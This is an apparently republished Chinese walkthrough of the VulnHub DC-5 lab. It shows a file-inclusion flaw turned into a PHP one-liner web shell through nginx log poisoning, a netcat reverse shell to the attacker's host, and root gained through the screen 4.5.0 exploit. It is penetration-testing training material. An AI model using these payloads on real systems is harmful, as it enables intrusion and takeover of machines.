vulnhub DC-5靶场

这篇具有很好参考价值的文章主要介绍了vulnhub DC-5靶场。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录
  • 1.信息收集
  • 2.网站分析
  • 3.漏洞利用
  • 4.提升权限

1.信息收集

扫描主机

sudo arp-scan -l

扫描端口

nmap -p- 192.168.42.149

扫描指纹

whatweb 192.168.42.149

查看端口详细服务

nmap -A -p- -v 192.168.42.149

2.网站分析

扫描目录

dirbuster

浏览网站,发现都是静态页面

只有contact.php有上传窗口

尝试上传,发现问题copyright旁的数字发生变化,猜测thankyou.php存在文件包含

包含文件为footer.php

3.漏洞利用

开始bp测试字段(下面没图了,bp爆破,网站日志太大,无法连接蚁剑,建议大家在此靶场不要跑bp)

thankyou.php?file=/ect/passwd

植入一句话木马

thankyou.php?file=<?php @eval($_POST[cmd]);?>

由于前面信息收集我们确认了是nginx的站,访问日志和错误日志应该如下

/var/log/nginx/access.log

/var/log/nginx/error.log

文件包含,蚁剑连接shell

thankyou.php?file=/var/log/nginx/error.log

cmd

将shell反弹到kali上便于操作

s:nc hackip 8888 -e /bin/sh

监听

hack:nc -lvp 8888

优化界⾯

python -c "import pty;pty.spawn('/bin/bash')"

4.提升权限

提权常规命令

sudo -l

find / -perm -u=s -type f 2>/dev/null

提权命令网站

https://gtfobins.github.io/

发现screen 4.5.0,查找他的漏洞

searchsploit screen 4.5.0

searchsploit -m linux/local/41154.sh

下载攻击脚本

usr/share/exploitdb/exploits/linux/local/41154.sh

然后在桌面上用vim打开文件

发现脚本由三部分组成,两个c文件,一个命令集,拆分为三部分

(三选其一即可)

1.kali监听端口

python -m SimpleHTTPServer 8000

2.攻击机在kali上下载脚本

``wget 192.168.42.149:8888/libhax.c wget 192.168.42.149:8888/rootshell.c wget 192.168.42.149:8888/dc5.sh`

3.用蚁剑上传也可(必须上传在/tmp上,因为脚本写的是/tmp)

给脚本给权限

chmod +x dc5.sh

chmod 777 dc5.sh

在靶机上编译比较好,因为新版的kali可能版本较高

gcc -fPIC -shared -ldl -o libhax.so libhax.c

gcc -o rootshell rootshell.c

./dc5.sh执行脚本

提权成功文章来源地址https://www.toymoban.com/news/detail-750764.html

到了这里,关于vulnhub DC-5靶场的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • vulnhub靶场之DC-9

    只有一个flag 虚拟机开启之后界面如上,我们不知道ip,需要自己探活,网段知道:192.168.52.0/24 目标就是我们搭建的靶场,靶场IP为:192.168.52.0/24 (1)寻找靶场真实ip 靶场的真实ip地址是192.168.52.131 (2)探测端口及服务 注意到ssh服务端口是filtered的,可能是因为什么原因关闭了 也

    2024年01月16日
    浏览(33)
  • vulnhub靶场之DC-2

    与DC-1非常相似,DC-2是另一个专门建造的易受攻击的实验室,目的是在渗透测试领域获得经验。 与最初的DC-1一样,它的设计考虑到了初学者。 Linux 技能和对 Linux 命令行的熟悉是必须的,对基本渗透测试工具的一些经验也是必须的。 就像DC-1一样,有五个标志,包括最后一个

    2024年01月22日
    浏览(38)
  • vulnhub练习 DC-1复现及分析

    靶机:DC-1 192.168.200.17 攻击机:kali 192.168.200.13 攻击机和靶机的网络连接方式要相同,另外DC-1的网络连接方式我这里采用NAT模式,是与kali的网络连接模式相同的(当然亦可以选用桥接模式) DC-1网络设计 点击高级后可以查看DC-1的靶机MAC地址,便于扫描IP时识别 KALI网络设计 根

    2024年02月21日
    浏览(37)
  • Web渗透漏洞靶场收集

    “如果你想搞懂一个漏洞,比较好的方法是:你可以自己先用代码编写出这个漏洞,然后再利用它,最后再修复它”。—-摘自pikachu漏洞靶场的一句话。 初学的时候玩靶场会很有意思,可以练习各种思路和技巧,用来检测扫描器的效果也是很好的选择。今天,我们来数数那些

    2024年02月07日
    浏览(36)
  • 信息收集 - 网站服务器

    操作系统 区分大小写: 如果修改首页或其他页面的大小写后,网站返回一个错误页面,例如报错 \\\"404 Not Found\\\" 或类似的错误,这可能意味着网站运行在 Linux 或类 Unix 操作系统上。这是因为大多数 Linux 系统是区分大小写的 。 如果修改大小写后,网站页面正常显示,这可能意

    2024年02月21日
    浏览(45)
  • grafana 目录遍历(CVE-2021-43798)漏洞复现【VULFOCUS靶场-中级】--拿flag的历程

    漏洞名称 : grafana 目录遍历 (CVE-2021-43798) 漏洞描述 : Grafana 是一个用于监控和可观察性的开源平台。Grafana 版本 8.0.0-beta1 到 8.3.0(补丁版本除外)容易受到目录遍历,允许访问本地文件。易受攻击的 URL 路径是: grafana_host_url/public/plugins// ,其中是任何已安装插件的插件 ID。

    2024年02月15日
    浏览(36)
  • 信息收集-目录扫描(7kbscan御剑版)下载及使用

    例如:第二章-7kbscan御剑版 文章目录 前言 一、7kbscan御剑版          下载地址 二、使用步骤 1.引入库 2.读入数据 总结 提示: Web路径暴力探测工具-7kbscan御剑版 提示:以下是本篇文章正文内容,下面案例可供参考 下载地址 :  GitHub - 7kbstorm/7kbscan-WebPathBrute: 7kbscan-WebPath

    2024年02月13日
    浏览(49)
  • 网络&信息安全:nginx漏洞收集(升级至最新版本)

    💖The Begin💖点点关注,收藏不迷路💖 漏洞名称: nginx 越界写入漏洞(CVE-2022-41742) 风险等级: 高 高可利用: 否 CVE编号: CVE-2022-41742 端口(服务): 8000(nginx) 风险描述: NGINX 在 ngx_http_mp4_module 中存在漏洞,这可能允许攻击者激发 worker 进程的崩溃,或者通过使用特制的 mp4 文

    2024年04月11日
    浏览(46)
  • [Vulnhub靶机] DC-1

    [Vulnhub靶机] DC-1靶机渗透思路及方法(个人分享) 靶机下载地址: https://download.vulnhub.com/dc/DC-1.zip 靶机地址:192.168.67.28 攻击机地址:192.168.67.3 1.使用 arp-scan 命令扫描网段内存活的主机,以获取靶机ip地址 arp-scan -I 指定网卡 -l 2.使用  nmap  工具扫描靶机开放端口、服务版本

    2024年01月20日
    浏览(109)
  • [vulnhub]DC2

    信息收集 扫ip,有两种方式: arp 、 nmap 192.168.56.137 扫端口: flag1 我们使用浏览器登录80端口,发现登录不上,地址栏变为: http://dc-2 原因是dns解析不正确,我们需要在 hosts 文件中添加: 访问可以获得flag1 提示我们需要使用工具 cewl 获得字典,登录来获得flag2 flag2 cewl 首先需

    2024年02月15日
    浏览(32)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包